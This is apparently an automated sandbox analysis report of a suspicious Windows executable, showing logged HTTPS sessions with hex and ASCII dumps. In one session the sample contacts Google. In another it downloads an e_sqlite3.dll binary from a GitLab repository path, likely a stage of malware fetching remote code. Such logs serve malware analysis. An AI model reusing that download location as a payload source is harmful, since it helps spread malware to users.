                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 23 67 62 6d 70 69 2c 23 67 62 6d 70 69 64 2c 23 67 62 6d 70 69 77 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 23 67 62 67 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 6f 20 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 37 70 78 20 35 70 78 20 36 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 69 35 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 5f 38 64 35 61 66 63 30 39 2e 70 6e 67 29 3b 5f 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f
                                                                                                                                                                                                                            Data Ascii: ition:relative}#gbmpi,#gbmpid,#gbmpiw{*display:inline}#gbg5{font-size:0}#gbgs5{padding:5px !important}.gbto #gbgs5{padding:7px 5px 6px !important}#gbi5{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.co
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 7d 23 67 62 64 34 20 2e 67 62 6d 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 35 66 35 66 35 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 7d 23 67 62 64 34 20 2e 67 62 73 62 69 63 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 3a 76 65 72 74 69 63 61 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 70 78 7d 23 67 62 6d 70 64 76 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 32 29 3b 2d 6f 2d 62 6f 78 2d 73 68
                                                                                                                                                                                                                            Data Ascii: ;margin:10px 0}#gbd4 .gbmc{background:#f5f5f5;padding-top:0}#gbd4 .gbsbic::-webkit-scrollbar-track:vertical{background-color:#f5f5f5;margin-top:2px}#gbmpdv{background:#fff;border-bottom:1px solid #bebebe;-moz-box-shadow:0 2px 4px rgba(0,0,0,.12);-o-box-sh
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 65 72 69 66 7d 23 67 62 70 6d 73 7b 2a 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 67 62 70 6d 73 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 23 67 62 6d 70 61 6c 7b 2a 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 3b 62 6f 72 64 65 72 2d 73 70 61 63 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 6d 70 61 6c 61 2c 2e 67 62 6d 70 61 6c 62 7b 66 6f 6e 74 3a 31 33 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 32 30 70 78 20
                                                                                                                                                                                                                            Data Ascii: erif}#gbpms{*white-space:nowrap}.gbpms2{font-weight:bold;white-space:nowrap}#gbmpal{*border-collapse:collapse;border-spacing:0;border:0;margin:0;white-space:nowrap;width:100%}.gbmpala,.gbmpalb{font:13px Arial,sans-serif;line-height:27px;padding:10px 20px


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            20192.168.2.749715142.250.186.1004435472C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC40OUTGET / HTTP/1.1
                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1191INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Tue, 14 Jan 2025 11:48:12 GMT
                                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                                            Cache-Control: private, max-age=0
                                                                                                                                                                                                                            Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                                                                                            Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-WlAGQItuBbuE3tbl-BUqqA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                                            Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                            Set-Cookie: AEC=AZ6Zc-UN4aSM41G8yFTZnlaDNIB4-OVwyyE24tL8LRDt-gOdTKYreLz_ZwM; expires=Sun, 13-Jul-2025 11:48:12 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                                                                                                            Set-Cookie: NID=520=ZTskhQFBvOYOrlQDdt8sPr8xLg-6QdWupkutwHiszuQ1XKew5J8_EkDl3vTPSmdzjGbdM1o1YqwR52gdjKTcyS2kXnRM-KDHdgTuHqKtSK9gBNwfAk9OsgLGcPV0wr3SdUaAy8a0DI8nIapHp6vu31RRAOhgPQXD0MoM4mhNRNE2iT0jjxawjLn5MM9hwah25DtFVVwBDA; expires=Wed, 16-Jul-2025 11:48:12 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC199INData Raw: 34 35 63 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e
                                                                                                                                                                                                                            Data Ascii: 45c8<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google has man
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6f 64 70 2c 20 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61 72 64 5f 63
                                                                                                                                                                                                                            Data Ascii: y special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_standard_c
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 31 2c 39 33 38 2c 31 2c 36 2c 38 34 36 2c 38 30 2c 34 39 36 2c 31 35 31 2c 33 36 32 2c 32 38 35 2c 34 30 30 2c 32 2c 33 38 32 2c 32 2c 32 34 31 2c 34 33 2c 31 2c 36 2c 35 37 38 2c 32 2c 37 2c 36 35 2c 31 39 36 2c 32 35 34 2c 31 34 32 2c 32 35 32 2c 32 30 30 2c 32 2c 37 2c 31 2c 31 34 31 2c 36 30 2c 32 36 2c 31 36 37 2c 32 32 31 2c 36 38 35 2c 35 31 31 2c 33 32 31 2c 32 35 37 2c 36 36 33 2c 36 2c 33 30 36 2c 32 2c 31 30 31 36 2c 32 31 35 2c 39 35 2c 33 35 30 2c 31 39 34 2c 34 37 32 2c 35 33 38 2c 34 38 39 2c 31 37 2c 33 2c 33 34 37 2c 33 35 30 2c 31 30 34 2c 32 31 2c 33 31 34 2c 34 37 38 2c 31 2c 34 32 37 2c 32 2c 35 31 35 2c 39 31 32 2c 36 37 36 2c 31 36 34 2c 33 2c 34 31 34 2c 36 39 35 2c 39 33 35 2c 31 2c 35 2c 34 2c 34 2c 34 2c 36 35 2c 37 35 2c 34 38
                                                                                                                                                                                                                            Data Ascii: 1,938,1,6,846,80,496,151,362,285,400,2,382,2,241,43,1,6,578,2,7,65,196,254,142,252,200,2,7,1,141,60,26,167,221,685,511,321,257,663,6,306,2,1016,215,95,350,194,472,538,489,17,3,347,350,104,21,314,478,1,427,2,515,912,676,164,3,414,695,935,1,5,4,4,4,65,75,48
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 6c 65 2e 6b 45 49 3b 67 6f 6f 67 6c 65 2e 67 65 74 45 49 3d 6e 3b 67 6f 6f 67 6c 65 2e 67 65 74 4c 45 49 3d 70 3b 67 6f 6f 67 6c 65 2e 6d 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 2c 63 2c 68 2c 65 29 7b 65 3d 65 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 65 3b 64 7c 7c 28 64 3d 72 28 61 2c 62 2c 65 2c 63 2c 68 29 29 3b 69 66 28 64 3d 71 28 64 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 66 3d 6d 2e 6c 65 6e 67 74 68 3b 6d 5b 66 5d 3d 61 3b 61 2e 6f 6e 65 72 72 6f 72 3d 61 2e 6f 6e 6c 6f 61 64 3d 61 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6d 5b 66 5d 7d 3b 61 2e 73 72 63 3d 64 7d 7d 3b 67 6f 6f 67 6c
                                                                                                                                                                                                                            Data Ascii: le.kEI;google.getEI=n;google.getLEI=p;google.ml=function(){return null};google.log=function(a,b,d,c,h,e){e=e===void 0?k:e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){delete m[f]};a.src=d}};googl
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 6e 6f 68 72 65 66 22 29 3d 3d 3d 22 31 22 3b 62 72 65 61 6b 20 61 7d 61 3d 21 31 7d 61 26 26 62 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 2c 21 30 29 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 3e 23 67 62 7b 66 6f 6e 74 3a 31 33 70 78 2f 32 37 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 68 65 69 67 68 74 3a 33 30 70 78 7d 23 67 62 7a 2c 23 67 62 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 6f 70 3a 30 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 7d 23 67 62 7a 7b 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 70 78 7d 23 67 62 67 7b 72 69 67 68 74 3a 30 3b 70 61
                                                                                                                                                                                                                            Data Ascii: nohref")==="1";break a}a=!1}a&&b.preventDefault()},!0);}).call(this);</script><style>#gb{font:13px/27px Arial,sans-serif;height:30px}#gbz,#gbg{position:absolute;white-space:nowrap;top:0;height:30px;z-index:1000}#gbz{left:0;padding-left:4px}#gbg{right:0;pa
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 7a 2d 69 6e 64 65 78 3a 31 3b 74 6f 70 3a 2d 31 70 78 3b 6c 65 66 74 3a 2d 32 70 78 3b 72 69 67 68 74 3a 2d 32 70 78 3b 62 6f 74 74 6f 6d 3a 2d 32 70 78 3b 6f 70 61 63 69 74 79 3a 2e 34 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 3b 66 69 6c 74 65 72 3a 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 3b 2a 6f 70 61 63 69 74 79 3a 31 3b 2a 74 6f 70 3a 2d 32 70 78 3b 2a 6c 65 66 74 3a 2d 35 70 78 3b 2a 72 69 67 68 74 3a 35 70 78 3b 2a 62 6f 74 74 6f 6d 3a 34 70 78 3b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63
                                                                                                                                                                                                                            Data Ascii: tion:absolute;z-index:1;top:-1px;left:-2px;right:-2px;bottom:-2px;opacity:.4;-moz-border-radius:3px;filter:progid:DXImageTransform.Microsoft.Blur(pixelradius=5);*opacity:1;*top:-2px;*left:-5px;*right:5px;*bottom:4px;-ms-filter:"progid:DXImageTransform.Mic
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 62 65 62 65 62 65 3b 63 6f 6c 6f 72 3a 23 33 36 63 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 70 78 7d 2e 67 62 7a 30 6c 20 2e 67 62 74 73 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 74 73 61 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 39 70 78 7d 23 67 62 7a 20 2e 67 62 7a 74 2c 23 67 62 7a 20 2e 67 62 67 74 2c 23 67 62 67 20 2e 67 62 67 74 7b 63 6f 6c 6f 72 3a 23 63 63 63 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 62 32 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 67 62 74 6f 20 2e 67 62 7a 74 20 2e 67 62 74
                                                                                                                                                                                                                            Data Ascii: rder-color:#bebebe;color:#36c;padding-bottom:1px;padding-top:2px}.gbz0l .gbts{color:#fff;font-weight:bold}.gbtsa{padding-right:9px}#gbz .gbzt,#gbz .gbgt,#gbg .gbgt{color:#ccc!important}.gbtb2{display:block;border-top:2px solid transparent}.gbto .gbzt .gbt
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 78 7d 23 67 62 6d 70 69 77 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 39 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 23 67 62 6d 70 69 2c 23 67 62 6d 70 69 64 2c 23 67 62 6d 70 69 77 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 23 67 62 67 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 6f 20 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 37 70 78 20 35 70 78 20 36 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 69 35 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70
                                                                                                                                                                                                                            Data Ascii: x}#gbmpiw{display:inline-block;line-height:9px;padding-left:20px;margin-top:10px;position:relative}#gbmpi,#gbmpid,#gbmpiw{*display:inline}#gbg5{font-size:0}#gbgs5{padding:5px !important}.gbto #gbgs5{padding:7px 5px 6px !important}#gbi5{background:url(http
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 6f 6c 6f 72 3a 23 30 30 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 6d 68 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 7d 23 67 62 64 34 20 2e 67 62 6d 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 35 66 35 66 35 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 7d 23 67 62 64 34 20 2e 67 62 73 62 69 63 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 3a 76 65 72 74 69 63 61 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 70 78 7d 23 67 62 6d 70 64 76 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                                                            Data Ascii: olor:#000 !important;font-weight:bold}.gbmh{border-top:1px solid #bebebe;font-size:0;margin:10px 0}#gbd4 .gbmc{background:#f5f5f5;padding-top:0}#gbd4 .gbsbic::-webkit-scrollbar-track:vertical{background-color:#f5f5f5;margin-top:2px}#gbmpdv{background:#fff
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 63 65 3a 6e 6f 72 6d 61 6c 7d 23 67 62 70 6d 20 2e 67 62 70 6d 74 63 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 30 30 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 3a 31 31 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 23 67 62 70 6d 73 7b 2a 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 67 62 70 6d 73 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 23 67 62 6d 70 61 6c 7b 2a 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 3b 62 6f 72 64 65 72 2d 73 70 61 63 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 77 69 64 74 68 3a 31
                                                                                                                                                                                                                            Data Ascii: ce:normal}#gbpm .gbpmtc{border-top:none;color:#000 !important;font:11px Arial,sans-serif}#gbpms{*white-space:nowrap}.gbpms2{font-weight:bold;white-space:nowrap}#gbmpal{*border-collapse:collapse;border-spacing:0;border:0;margin:0;white-space:nowrap;width:1


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            21192.168.2.749847172.65.251.784435472C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-01-14 11:48:35 UTC127OUTGET /hko247.black/libs/-/raw/da36e8916e710628358afbbd35fc9d73b2fd41c2/e_sqlite3.dll?inline=false HTTP/1.1
                                                                                                                                                                                                                            Host: gitlab.com
                                                                                                                                                                                                                            2025-01-14 11:48:36 UTC512INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Tue, 14 Jan 2025 11:48:35 GMT
                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                            Content-Length: 1780736
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            CF-Ray: 901d65dcaf336a5e-EWR
                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            Age: 7
                                                                                                                                                                                                                            Cache-Control: max-age=3600, public, must-revalidate, stale-while-revalidate=60, stale-if-error=300, s-maxage=60
                                                                                                                                                                                                                            Content-Disposition: attachment; filename="e_sqlite3.dll"; filename*=UTF-8''e_sqlite3.dll
                                                                                                                                                                                                                            ETag: "fc529fb92be2696af6fda5021785be60"
                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                            2025-01-14 11:48:36 UTC2134INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 61 70 74 63 68 61 2e 6e 65 74 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 6e 73 2e 68 74 6d 6c 20 68 74 74 70 73 3a 2f 2f 2a 2e 7a 75 6f 72 61 2e 63 6f 6d 2f 61 70 70 73 2f 50 75 62 6c 69 63 48 6f 73 74 65 64 50 61 67 65 4c 69 74 65 2e 64 6f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 64 6d 69 6e 2f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
                                                                                                                                                                                                                            Data Ascii: content-security-policy: base-uri 'self'; child-src https://www.google.com/recaptcha/ https://www.recaptcha.net/ https://www.googletagmanager.com/ns.html https://*.zuora.com/apps/PublicHostedPageLite.do https://gitlab.com/admin/ https://gitlab.com/assets/
                                                                                                                                                                                                                            2025-01-14 11:48:36 UTC500INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 66 4a 54 42 76 48 71 5a 57 77 78 31 41 58 73 35 7a 53 35 6c 47 42 46 76 6a 30 72 38 6b 56 77 50 4c 72 48 64 45 4a 6c 32 5a 44 69 6b 71 72 79 78 66 52 25 32 42 64 34 67 70 79 6e 32 59 50 66 51 49 36 6c 61 36 79 66 36 71 35 75 64 33 59 66 39 73 35 69 77 38 48 61 35 78 44 25 32 42 55 37 69 4a 71 6a 54 4c 69 30 63 4e 55 66 70 7a 38 53 4c 74 58 59 25 32 42 55 44 75 49 37 69 65 71 62 4c 51 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20
                                                                                                                                                                                                                            Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fJTBvHqZWwx1AXs5zS5lGBFvj0r8kVwPLrHdEJl2ZDikqryxfR%2Bd4gpyn2YPfQI6la6yf6q5ud3Yf9s5iw8Ha5xD%2BU7iJqjTLi0cNUfpz8SLtXY%2BUDuI7ieqbLQ%3D"}],"group":"cf-nel","max_age":604800}NEL:
                                                                                                                                                                                                                            2025-01-14 11:48:36 UTC1369INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4e b6 df 42 0a d7 b1 11 0a d7 b1 11 0a d7 b1 11 41 af b2 10 1e d7 b1 11 41 af b4 10 99 d7 b1 11 41 af b5 10 2b d7 b1 11 41 af b0 10 09 d7 b1 11 0a d7 b0 11 83 d7 b1 11 58 a2 b4 10 2a d7 b1 11 58 a2 b5 10 04 d7 b1 11 58 a2 b2 10 00 d7 b1 11 c7 a2 b5 10 08 d7 b1 11 c7 a2 b1 10 0b d7 b1 11 c7 a2 4e 11 0b d7 b1 11 c7 a2 b3 10 0b d7 b1 11 52 69 63 68 0a d7 b1 11 00 00 00 00 00 00 00
                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$NBAAA+AX*XXNRich
